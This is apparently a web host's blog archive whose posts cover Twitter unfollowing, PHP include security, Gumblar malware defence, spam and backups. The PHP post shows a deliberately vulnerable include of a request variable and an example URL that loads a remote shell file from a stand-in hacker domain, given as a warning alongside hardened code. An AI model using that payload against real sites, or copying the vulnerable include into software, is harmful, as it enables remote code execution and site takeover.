RSS Updates

6 Jul 2010

How To Bulk Unfollow On Twitter in Minutes

I haven’t “tweeted” for a long time. I joined Twitter on the general bandwagon last year, downloaded and installed TweetDeck – and pretty much forgot about it. I did turn on Auto-Follow via SocialOomph though. So a year later I have 3,000 followers and maybe 50 are HostNexus clients and people I know. So 2,950 people have followed me for the sole reason of spamming me with links to their sites. They don’t care what I say because, well, I say very little. If I’m ever going to really use Twitter I need to follow only those I have a general interest in following and that is people I choose to follow and any past, present or prospective clients of HostNexus.

So today I went on a mission to purge my Twitter account.

As most people in Twitterdom know, there are thousands of apps that help you manage your Twitter account, so I thought that mass unfollowing on Twitter was going to be pretty simple. I tried several tools but all either had no Bulk Unfollow option or no Select All option. I started hitting Unfollow on people on Twitter Karma but that got real old after about 100 clicks. I then started hitting checkboxes on Tweepi and Untweeps but another 150 clicks later my right index finger started to cramp up in a death grip from hell. Both Tweepi and Untweeps also fail to list all your followers, so it was kind of pointless anyhow. I then found ManageFlitter, which listed all your followers in pages of 100 with checkboxes, but of course no Select All option.

I did some digging and found out that Twitter had put their foot down on Mass Unfollowing in April of this year (2010). All applications either had to remove Bulk Unfollow options or the Select All option to continue to operate within Twitter’s updated TOS. Pretty ridiculous. I can understand enforcing a Bulk Unfollow option but telling developers to remove a “Select All” option? Very weird. But it got me thinking. The Select All thing is just a JavaScript call and happens in your browser, so surely there should be a nifty little Firefox plugin that allows me to Select All?

21 Jun 2010

PHP Security and YOU – Including files the right way

As a web host we fight the battle against hackers and bad code on a daily basis. So HostNexus is looking to encourage clients to use file inclusion within PHP in a more security conscious and safe manner.

Including files with PHP is a common practice and most usage comes in two forms: including internal files from your own domain, and including files from remote (external) sources. This looks something like:

Internal:

<?php
   // Including your own file by URL (the problematic form discussed below)
   include("http://www.myowndomain.com/something.txt");
?>

External:

<?php
   include("http://www.externaldomain.com/something.txt");
?>

Both are valid syntax in the PHP world but there are two main problems we see on the servers. When you include a file using the URL of your local domain, the server makes an HTTP request to itself; this can turn into a PHP loop of endless HTTP requests, which causes server load issues and can even crash the server under the load. If you want to include files from your local domain you just need to use the server path instead:

<?php
   // Include by filesystem path: no HTTP request is made
   include('/home/httpd/vhosts/myowndomain.com/httpdocs/something.txt');
?>

And now onto using include() for calling external files:

<?php
   include("http://www.externaldomain.com/something.txt");
?>

The first problem with include() is that it runs everything it fetches through the PHP parser and evaluates it as code. The second, and worse, problem comes from passing a variable to include(), which can be easily exploited. Here is an example of code in an index.php:

<?php
    echo "<html>\n";
    echo "  <body>\n";
    // $go arrives unvalidated from the request (?go=...), so whoever sends
    // the request chooses which file, local or remote, gets parsed as PHP
    include("$go");
    echo "  </body>\n";
    echo "</html>\n";
?>

The $go variable above is easily exploited like:

http://myowndomain.com/index.php?go=http://www.hackerdomain.com/shell.txt

The hacker can now run code on your account: modifying your files, installing phishing sites, sending spam and stealing data.

If you want to include files from remote domains use PHP’s readfile() function instead:

http://www.php.net/manual/en/function.readfile.php

While not 100% secure, it still provides more protection, as readfile() simply outputs the data to the browser rather than parsing it as PHP.
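A hardened replacement for the `include("$go")` page above, added here as an example (it is not code from the original post): the request value is matched against an allow-list and mapped to a file under a fixed server path, which is the combination of the two practices recommended above. The base directory is a constructed path; adjust it to your own vhost.

```php
<?php
// Added example, not from the original post: hardened replacement for include("$go").
// The ?go= value is looked up in a fixed allow-list and only files under a constant
// base directory are included, always by server path, never by URL.
declare(strict_types=1);

// Constructed path for illustration; point this at your own vhost.
const BASE_DIR = '/home/httpd/vhosts/myowndomain.com/httpdocs/pages';

// Only these names may be requested via ?go=; the raw value is never used as a path.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve an untrusted ?go= value to a safe local file path, or null if it is
 * not on the allow-list or does not resolve to a file under BASE_DIR.
 */
function resolvePage(string $go): ?string
{
    if (!array_key_exists($go, PAGES)) {
        return null;                       // unknown name: refuse
    }
    $path = realpath(BASE_DIR . '/' . PAGES[$go]);
    // realpath() returns false for a missing file; the prefix check guards
    // against a mis-edited allow-list entry pointing outside BASE_DIR.
    if ($path === false || strpos($path, BASE_DIR . '/') !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly rather than relying on register_globals.
$go   = isset($_GET['go']) ? (string) $_GET['go'] : 'home';
$page = resolvePage($go);

echo "<html>\n";
echo "  <body>\n";
if ($page !== null) {
    include $page;                         // a server path from our own table
} else {
    http_response_code(404);
    echo "    <p>Page not found.</p>\n";
}
echo "  </body>\n";
echo "</html>\n";
```

Also confirm that allow_url_include is Off in php.ini (it has defaulted to Off since PHP 5.2), which makes the include-a-URL form fail outright. Where you do use readfile() on a remote source, keep the URL hard-coded and remember its output still lands in your page, so escape it with htmlspecialchars() unless it is markup you trust.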

We’d love to enforce the two practices above but we also understand not everyone is happy modifying code. However, if you know you use includes and have even a simple understanding of these functions, then please do revisit your code and help yourself to secure your data and server.

Laurence

14 Apr 2010

How To Get A Professional Website Online Within One Week, For Less Than $199, And No Design Experience

The main hurdles most people face when thinking about getting a decent website up is that it is too expensive and/or requires certain nerdy technical skills such as graphic design or some kind of coding skills. And quotes from web design firms of $500 to $50,000 definitely serve to discourage many from developing an online corporate presence or even putting up a personal website.

Ten or even five years ago putting up a website was expensive and took time. But times have changed and time, money and skills (or lack thereof) are no longer obstacles would-be webmasters have to deal with. If you’ve ever thought about getting a nice website online but have always dreaded the task, here are my 7 Steps To Get Online.


5 Oct 2009

Gumblar – How To Avoid Getting Hacked


2009 is The Year Of The Gumblar. You might not know the name but I’m sure you’ve experienced it either directly (hopefully not) or indirectly. Have you ever been surfing and come across a page with a big red sign warning you against entering the site? If you have, then there’s a good chance that site was hit with Gumblar or one of its variants like Nine Ball, Martuz or a host of other weird and wonderful names. If you run a successful online business, can you imagine the damage such an attack could do? I actually got hit with it on a personal site I just use for storing photos. But when I thought of the damage it would have done if it had hit HostNexus... it certainly got my attention.

So what is Gumblar and how does it work? These are things EVERY webmaster MUST know! The original Gumblar used a vulnerability in Adobe Acrobat and Flash player but subsequent variants use other exploitable software but all have the same end result. I won’t go into the technicalities of how your computer gets infected but you need to know what it does. Once infected it listens in on any FTP connections and steals the connection information. Usually within minutes the virus uses your FTP account to modify files and insert some nasty code. This code is normally an iframe, javascript or some other code that triggers a malware download from another computer.

The virus will sometimes modify PHP code and insert phpshell scripts, which in turn attempt to install the malware that other infected sites connect to in order to trigger malware downloads to unsuspecting site visitors. This is a three-pronged nightmare that just grows exponentially: from local computer to FTP account to server infection, and the wheel keeps on turning. So what’s the defence?

The virus is three-pronged and therefore everyone needs to cover as many of these vulnerabilities as possible.

1) Your Computer – a decent “On-Access” anti-virus program is all you need. When I got infected I was running a cheap AV program that wasn’t On-Access. This simply means the AV program automatically scans anything that is downloaded to your computer or any file that you open on your computer. If your anti-virus just gives you a daily scan you are NOT protected. You could get infected, download some nasty stuff to your computer and proliferate the virus before you even get to your daily scan.

2) FTP over SSL. If you are on a Linux server simply choose a connection option in your FTP program that is encrypted or just says “SSL”. All of our shared servers should have this working. If you find it doesn’t please contact Support and we will fix it! With this option your connection info is sent encrypted and not in plain text, so the virus cannot sniff it out. We would love to implement this by default (forcing people to use it) but even though we could post about it in a newsletter, on a mail list, on our blog and on our forum we would still get hundreds of tickets asking why their FTP doesn’t work. As awareness grows maybe we will implement it slowly.

If you have a dedicated server and would like FTP over SSL activated please contact Support.

Bad news for Windows clients on this front. Our Windows servers don’t currently support FTP over SSL as this is a feature included in the newer Windows 2008 OS with IIS7. It’s a huge change and one that we aren’t quite ready for. But you can still install a decent Anti-Virus program. :)

3) Server Infection – this is one area where Windows servers aren’t as vulnerable. The virus uses PHP, which needs to be running as a global user such as Apache to do its damage. PHP on Windows has run under the user’s FTP username as CGI for ages, so even if files get infected the virus cannot break out of the user’s home directory. On Linux though PHP has run as Apache for aeons and it’s only with later versions of Plesk that we now have the option to run PHP as CGI or FastCGI. So if you’re on Plesk 9 I encourage you to switch PHP to a FastCGI application under Web Host Settings for the domain. Some scripts can break with it, so if you are not sure please don’t hesitate to contact Support and we will advise you. Scripts tend to run faster under FastCGI too, so you are in fact doing yourself a service. :D

This year we’ve been dealing with Gumblar related issues almost on a weekly basis. It is very hard to convince someone that the server hasn’t been hacked when their website is showing the Reported Attack Site page. In these cases the issue almost always lies with the user’s computer being infected.

But we have also had cases where the virus has spread through Apache-owned PHP files, causing malicious downloads and random page redirects to search results containing a list of infected sites. We can always track down the source but it is very frustrating for us as hosts and for our users. In this case a solution would be to force every domain using PHP to run as FastCGI, but as with the FTP solution there would be even more fallout. So it’s a balancing tightrope act with a bit of a dodgy safety net. All we can do as hosts is raise our own community’s awareness of this problem, which doesn’t seem to be going away any time soon, and hope that in the future we can implement stricter safeguards against this menace.

I just posted this on our blog so feel free to comment there. If you’d prefer to discuss any of this in our forum that would also be most welcome.

26 Sep 2009

The zen of SpamHaus

(Somewhat long but scroll to the bottom for the important parts if pressed for time)


How would you like to reduce the amount of spam coming into your mailbox by 90%?

Yes…..90%.

It can be done and it can be done very easily, but for many the price might be too high. See, the fight against spam is kind of a catch 22. There is no solution out there that, even if it works great, won’t aggravate some users. For web hosts this is particularly painful. A host’s client base often demands less spam but in my experience they are unwilling to pay the price. This is why most hosts just let the email flow and give their clients end-user tools with which to fight spam – and on the whole it works well. By using SpamAssassin and some filters I generally don’t see much spam in my inbox. On average maybe 5-10 per day. The rest gets tagged and filtered. I can certainly live with that – but some people can’t.

22 Aug 2009

How To Start a WebHosting Company – Part 1


The webhosting industry is very different from 2001 when I started HostNexus but many things are still the same. It’s true the competition is fierce. It’s probably the most competitive industry on the internet today. But there is good news – the internet is not getting any smaller. In fact it’s always growing as more and more people get online each and every day. Since I started HostNexus ONE BILLION people have come online – a growth of over 300% in 8 years. There will always be room for more hosting companies as long as people keep putting up websites.

13 Aug 2009

Easy MySQL Backups

Bit of a backup theme for this week, but remember in my last post I did say I was obsessed with backups! The last post addressed our server-to-server backups, how they work and a nice example of how they can save our collective asses in the event of a 100% data loss meltdown.

But what about your own personal backups? We can of course use our system to restore individual files and databases for you – no problem there but everyone should also have personal backups. Files are easy. If you’re like me you have your sites in folders on your PC/laptop and you edit files there and upload via FTP. So by default you have a copy of your files. But what about databases? A database is written on the server so special considerations have to be made. You can do backups in phpMyAdmin and download them. But who wants to do that weekly, let alone daily? And then download the backups to your computer? I’ve done it all manually and it just sucks. You will definitely forget and that daily backup becomes weekly, then monthly, then quarterly….

9 Aug 2009

Much Love For Backups

I love backups. In fact one could say I’m a little obsessed with backups. At HostNexus we back up shared/reseller servers to big beefy backup servers across a private network at the data center. Back in the old days we used to use disk-to-disk backups and this is still the default backup method for managed dedicated servers. But as shared/reseller servers fill and get busy the amount of data can get quite large, and disk-to-disk backups start to take a lot of time and cause very high loads on the server, so enter the remote backup system.

14 Apr 2009

The Site That Took Three Years To Build

Our new site has been live for a month now. The feedback has been truly amazing. So many people mentioned how much they liked the site and many emailed us just to say that. I thought the site was good but the sheer amount of positive feedback really took me by surprise.

We have seen a 400% increase in sales and about the same increase in traffic. The traffic stats are a bit skewed because the old NexusPortal is now integrated with HostNexus so the stats include forum traffic and support traffic. But there is no doubt that a good site helps convert visitors into customers. I saw the same thing 6 years ago when we launched the old Ceonex site.

But how often should a company change its site? The net is an ever-transforming animal so there really is a need to change designs to keep up with the latest trends. Some people say once a year but I think that’s a bit much and I certainly wouldn’t be able to handle that. I think maybe every 2 years would be okay for small changes. In our case it had been 6 years so a radical change was needed, but believe it or not I set out on this mission to get a new site up for HN in June 2006 – yep, 3 years ago. So just how can a site take 3 years to build?

6 Apr 2009

SEO Case Study: HostNexus

This is part 4 in the Search Engine Strategy Series where I am documenting my own journey in SEO and the effects it is having on HostNexus. For a table of contents on this series please see the first post.

There is too much “do what I say and not what I do” on the internet, so to prove I am practising what I preach here is a little case study. I’m detailing the keyword terms I’m targeting and where we stood at the beginning, and will update regularly (maybe once a month) to see how we are getting on.

A few things to point out though: